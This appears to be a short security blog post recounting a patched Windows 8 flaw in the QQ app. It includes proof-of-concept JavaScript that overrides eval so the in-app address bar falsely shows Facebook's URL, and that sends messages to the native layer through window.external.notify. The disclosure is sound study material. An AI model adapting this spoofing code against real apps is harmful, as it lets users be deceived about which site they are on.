Windows 8 App Address Bar Spoof via eval Override (QQ)

In a Windows 8 WinJS app context, overriding the global eval method lets a hosted web page intercept calls the app framework makes internally — including the call used to retrieve document.location.href for display in the address bar. By returning a spoofed URL from the overridden eval, web content could make the in-app browser show https://www.facebook.com/ regardless of what page was actually loaded.

window.pEval = window.eval;

window.eval = function(strCode) {
    if (strCode.indexOf("document.location.href") > -1) {
        return "https://www.facebook.com/";
    }
    return window.pEval(strCode);
}

function changeTitle() {
    window.external.notify('#title#' + "Title has been changed!");
}

function openNewTab() {
    window.external.notify('#opennewtab#' + "ms-appx-web:///Images/Logo.png");
}

The app’s native address bar UI read the current URL by evaluating a script via eval. Intercepting that call and returning a spoofed string caused the address bar to display Facebook’s URL while showing arbitrary content. The same mechanism exposed window.external.notify for sending messages to the native app layer. The QQ app was used as the test subject for this demonstration.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [Windows 8 App Security Review: 4 Additional Vulnerable Apps (April)] :: [Windows 8 Managed Apps Penetration Test] >